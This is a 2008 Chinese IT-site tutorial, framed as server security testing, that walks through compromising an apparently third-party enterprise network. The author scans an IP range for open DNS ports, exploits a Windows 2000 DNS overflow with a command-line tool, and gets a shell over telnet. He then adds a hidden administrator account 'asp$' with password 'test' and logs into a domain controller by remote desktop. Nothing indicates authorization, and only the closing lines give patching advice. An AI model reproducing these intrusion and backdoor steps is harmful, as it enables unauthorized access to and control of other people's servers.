IT运维管理,创造商业价值!
中国IT运维网首页 | 资讯中心 | 运维管理 | 信息安全 | CIO视界 | 云计算 | 最佳案例 | 运维资源 | 专题策划 | 知识库 | 论坛

手把手教你企业服务器安全性测试(2)

2008年04月21日
/

二、DNS溢出测试

  1.缘由:

  DNS溢出漏洞是去年微软的一个高危漏洞,攻击者通过该漏洞可以溢出获得一个shell,进而控制这台服务器。一年过去了,还有存在该漏洞的服务器吗?

  2.测试:

  笔者以某企业网站的IP为中心进行测试。

  第一步:先看看该网站Web服务器的IP地址,打开命令提示符,敲入如下命令:ping www.*.com,得知ip地址为:202.2##.*.196。

  第二步:以202.2##.*.196为中心确定一个IP段,在命令行下用S扫描器扫描开放了53端口(DNS端口)的服务器。对扫描结果中的IP逐个进行溢出测试,经过一次次的测试找到了一个存在DNS溢出的IP。在命令行下敲入如下命令:dns -s 202.2##.*.196,显示如图4。(图4)

 

 说明:服务器采用的是windows 2000,在1052端口存在DNS溢出漏洞。

  第三步:继续在命令行下,敲入如下命令:dns -t2000all 202.2##.*.196 1052 显示如图5。(图5)

手把手教你企业服务器安全性测试(图五)


    
    第四步:重新打开另外一个命令提示符,敲入命令:telnet 202.2##.*.196 1100,速度很快,返回一个shell,溢出成功。在telnet界面中敲入如下命令:net query,显示如图6,看来管理员不在线。(图6)

 

第五步:在Telnet命令提示符下敲入命令:net user asp$ "test" /add
  net localgroup administrators asp$ /add,建立一个具有管理员权限的asp$账户,密码为“test”。在本机运行“mstsc”,打开“远程桌面连接工具”,输入IP地址:202.2##.*.196,用户名:asp$

  密码:test,连接成功如图7。(图7)
 

第六步:打开“管理工具”,发现这台主机还是一个域控制器,打开“域用户和计算机”,域成员竟然有43511个如图8,看来这个企业的局域网的规模不小。(图8)

手把手教你企业服务器安全性测试(图八)

总结:一年前的漏洞到现在还没有打,管理员太失职了。

  上面有关服务器的两例安全测试,虽是个案不具有普遍性,但其中反应出的管理员的疏忽大意及其安全意识淡薄是不容忽视的。笔者认为,作为企业服务器稳定高效固然重要,但安全更重要,没有了安全性其他都无从谈起。就让我们从为服务器打好补丁,设置健壮的密码开始,全方位地打造安全的服务器。

 


 

发表评论请到:http://bbs.cnitom.com

相关阅读

图文热点

谷歌即将发布新操作系统:冰激凌三明治
谷歌即将发布新操作系统:冰激凌三明治斯科特麦恩(Scott Main) 北京时间9月20日上午消息,据美国科技博客AllThingsD报道...
新手指南:四大妙招掌握linux系统维护
新手指南:四大妙招掌握linux系统维护对于服务器系统来说,Linux服务器相对来说比Windwos服务器要稳定与安全。但是对于...

本类热点